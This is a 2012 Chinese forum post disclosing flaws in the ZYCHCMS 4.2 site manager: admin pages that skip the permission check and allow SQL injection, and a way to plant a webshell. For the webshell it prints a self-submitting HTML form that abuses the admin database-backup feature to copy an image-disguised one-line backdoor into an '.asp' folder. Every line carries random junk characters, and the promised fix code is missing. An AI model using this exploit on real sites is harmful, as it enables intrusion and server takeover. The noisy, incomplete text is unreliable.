5 q7 ` h9 N/ G. n8 p
" j% Z5 a1 ^9 t
7 {( X$ u2 X( g$ I; Z: ?8 k( I" `* u4 G
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)! Y# e4 s; `, h' V
①SQL注射漏洞
' m ~: D. Q, c" Q$ Z+ Z H9 O1 h% k 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp' L# h% N6 @6 [! v3 j2 F
漏洞原因:未过滤/ i( W' L4 F- ?2 m) N# v
漏洞代码:
6 ?) A! |# Y6 D$ A$ ~# Y 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
: P* l! v) i2 F5 ]. i 修复方法:在文件开头加入代码6 k2 g- z; v( v$ |
/ L i: Q4 v" L! B' e
& h' F- @4 \5 {- D( v②后台拿WBSHELL3 ]1 u- j" l' s# K$ a3 k
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
0 o: T: @* l6 X9 Y( a/ N7 g2 \ 这里在网上找了一个,改了下,将就着用。
. R9 d4 K, B9 n& C, l' y 以下是代码本地提交代码
. _1 _8 K' t; p! e
/ z0 a6 F2 c' Y* A4 U
0 @( n' r9 S$ Y- S0 h3 y<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>, E' A" L9 }& Q, t0 {* s
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
' _! c' B+ c# A2 f <tr>8 s7 i: F5 F- \4 R3 I" G( |
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
% K3 Z. i0 m& W! N; D </tr>
0 b( v& ~3 C# q: Q8 I3 D+ @* q <tr>' Z. V/ z7 q# ]" Y9 u$ y, N$ c( t' A
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
4 Z; G+ A8 Z, y: ]& v% J+ T# N </span>
: e# p$ i: L# O' U8 c <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
# H% v5 o- P+ M% m5 V$ n- r9 Q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >2 J% N+ T, |2 [; L H3 q, ~& S$ d
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>- `; y8 g0 m/ o. X7 I
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
+ k% \" Y% i9 | <div align=”left”>+ T2 \. K: e T9 ^* ^3 H
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
( k( F t0 h* U <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
: P: h, P/ m1 z ^. R4 v <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />6 E r* m! S4 E' A& T, h
</div></td>* o) m4 x! Y: q" p- T9 U' r$ B
</tr>* o: S4 K7 [$ K3 q7 p( u
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
$ z0 u5 ^* d7 a8 W <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
" {' q; _6 M o a <td class=”td”><div align=”left”>
u( ^. g& q! f7 x! K' B <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />2 V! M9 K/ d8 }- E, I- t, q
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>4 ?; A1 Q2 f/ S; W& P: X8 U
</tr>$ s. M5 r/ U. `6 i
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″> Y5 B2 V5 z& s- U+ }9 O: S3 z A
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>* h- o8 X! P& C
<td class=”td”><div align=”left”>1 A& a; | f8 B3 Q3 F7 o
<input type=”submit” value=”确定备份” class=”btn”! f0 T, n F* d
</div></td>
& |8 g5 m/ R9 e/ ]5 d- G7 | </tr>& s" }4 |: t( k+ @7 U5 X
</table></td></tr></form>
; O( {8 W5 a, d+ ], C: v8 G4 t </table>9 E7 G9 D8 q. H# t) y* Z
</td>) L6 Q' v; c) I; k+ u
</tr>2 d# R1 Y0 i4 @$ q7 @8 K [
</table>
0 H% }, }1 P# D1 G <script>3 Z( K) Y% Q2 R; c& r8 i
document.all.add.submit();
9 [4 ^* O( y: q2 ~0 X# Q2 | </script>" r9 ]3 R$ e+ r$ O
5 y# o7 Q7 y5 D: `2 A3 V
( f$ y+ [0 R) X0 U% \0 y
, l; N6 h' z4 v# {# y) I. h
$ j8 x! J( G( X& C1 \& l# H) W( G4 w$ b, [* a: R4 j
4 o4 \; @- }( E& U6 J- ^- h: h S
, x2 P1 D" a+ p# t! G
( @6 s2 C T3 Q0 h: V/ a4 b9 i8 P$ E6 \; R7 g+ B# F& A' c
* Y8 ?/ d" ?+ F9 K |
发表于 2012-9-10 21:09:51
收藏
支持
反对